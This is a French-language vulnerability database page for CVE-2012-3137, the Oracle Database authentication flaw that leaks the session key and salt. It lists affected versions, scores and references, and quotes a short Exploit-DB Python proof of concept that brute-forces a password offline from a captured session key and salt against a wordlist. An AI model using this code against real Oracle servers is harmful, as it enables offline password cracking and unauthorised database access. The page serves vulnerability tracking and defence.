CVE-2012-3137 : Détail

CVE-2012-3137

Authorization problems
A07-Identif. and Authent. Fail
1.93%V3
Network
2012-09-21
21h00 +00:00
2016-11-25
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to obtain the session key and salt for arbitrary users, which leaks information about the cryptographic hash and makes it easier to conduct brute force password guessing attacks, aka "stealth password cracking vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-287 Improper Authentication
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22069

Date de publication : 2012-10-17 22h00 +00:00
Auteur : Esteban Martinez Fayo
EDB Vérifié : No

source: https://www.securityfocus.com/bid/55651/info Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database. This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2. #-*-coding:utf8 -*- import hashlib from Crypto.Cipher import AES def decrypt(session,salt,password): pass_hash = hashlib.sha1(password+salt) #......... ..... ..... .......... .. 24 .... key = pass_hash.digest() + '\x00\x00\x00\x00' decryptor = AES.new(key,AES.MODE_CBC) plain = decryptor.decrypt(session) return plain #............. ........... ...... 48 .... session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767' #.... 10 .... salt_hex = 'A7193E546377EC56639E' passwords = ['test','password','oracle','demo'] for password in passwords: session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password) print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex')) if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08': print 'PASSWORD IS "%s"' % password break

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version 10.2.0.3

Oracle>>Database_server >> Version 10.2.0.4

Oracle>>Database_server >> Version 10.2.0.5

Oracle>>Database_server >> Version 11.1.0.7

Oracle>>Database_server >> Version 11.2.0.2

Oracle>>Database_server >> Version 11.2.0.3

Configuraton 0

Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.2

  • Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.2 (Open CPE detail)

Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.3

  • Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.3 (Open CPE detail)

Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.4

  • Oracle>>Primavera_p6_enterprise_project_portfolio_management >> Version 8.4 (Open CPE detail)

Références

http://www.exploit-db.com/exploits/22069
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/55651
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDVSA-2013:150
Tags : vendor-advisory, x_refsource_MANDRIVA